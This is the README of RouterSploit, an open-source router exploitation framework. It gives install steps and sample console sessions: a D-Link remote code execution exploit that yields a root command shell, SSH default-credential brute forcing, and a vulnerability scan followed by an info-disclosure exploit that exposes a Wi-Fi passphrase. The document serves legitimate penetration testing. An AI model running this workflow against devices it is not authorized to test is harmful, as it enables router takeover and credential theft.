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RouterSploit - Router Exploitation Framework

Python 2.7 Build Status Join the chat at

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.


It consists of various modules that aids penetration testing operations:

  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check if a target is vulnerable to any exploit



  • gnureadline (OSX only)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp

Installation on Kali

git clone
cd routersploit

Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
git clone
cd routersploit
pip install -r requirements.txt

Installation on OSX

git clone
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt

Running on Docker

git clone
cd routersploit
docker build -t routersploit:latest -f Dockerfile .


Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

cd routersploit
git pull


root@kalidev:~/git/routersploit# ./
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf >

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

You can use the tab key for completion.


Display module options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g.     
   port       80                   Target Port

Set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target
[+] {'target': ''}

Run module

You can exploit the target by issuing the 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami

It is also possible to check if the target is vulnerable to particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable


Display information about exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

D-LINK DIR-300 & DIR-600 RCE

Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

- D-Link DIR 300
- D-Link DIR 600

- Michael Messner <devnull[at]> # vulnerability discovery
- Marcin Bury <marcin.bury[at]> # routersploit module


2. Creds

Pick module

Modules located in the creds/ directory allow running dictionary attacks against various network services.

The following services are currently supported:

  • ftp
  • ssh
  • telnet
  • http basic auth
  • http digest auth
  • http form auth
  • snmp

Every service has been divided into two modules:

  • default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
  • bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).


rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) >


rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           

Module options:

   Name         Current settings                                                      Description                                              
   ----         ----------------                                                      -----------                                              
   threads      8                                                                     Numbers of threads                                       
   defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

Set target:

rsf (SSH Default Creds) > set target
[+] {'target': ''}

Run module

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'


Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) >

3. Scanners

Scanners allow you to quickly verify if the target is vulnerable to any exploits.

Pick module

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options


Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g.     
   port       80                   Target port                                

Set target:

rsf (D-Link Scanner) > set target
[+] {'target': ''}

Run module

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure

It has been verified that the target is vulnerable to dwr_932_info_disclosure exploit. Now use the proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target
[+] {'target': ''}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,,IT-PCs,0>40:b8:00:ab:b8:8c,,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0


The RouterSploit Framework is under a BSD license. Please see LICENSE for more details.